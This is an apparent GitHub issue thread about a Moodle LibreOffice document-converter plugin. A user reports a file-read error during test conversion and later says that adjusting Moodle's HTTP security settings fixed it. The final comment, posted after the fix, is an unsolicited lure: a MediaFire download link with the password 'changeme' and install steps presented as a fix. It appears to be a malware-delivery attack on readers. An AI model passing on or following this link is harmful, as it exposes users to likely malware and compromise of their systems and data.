### ISSUE TITLE
Moodle 4.4.2

### ISSUE THREAD

**Issue by mjencabh** [miotto/moodle-fileconverter_flasksoffice#5]
Hello

I have folowed your instructions for setting up rest server for Libre Office on own server, everything works fine.
When trying to test the converter on moodle i first get the " This document converter is configured properly. " but when trying to click on the "Test document conversion" afterwards I get: "Cannot read file. Either the file does not exist or there is a permission problem."

I cant seem to find any goarround on this? can you help me further?

in debug mode i get this:
Debug info: /tmp/requestdir/97Lg/66d4f4b6b9bd2/66d4f4b6b9d13/source.pdf
Error code: storedfilecannotread.

Kind regards
Michael

**Comment by mjencabh** [comment]
Ohhh i got it, its Moodle security issue, in http security section. Works perfect now.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
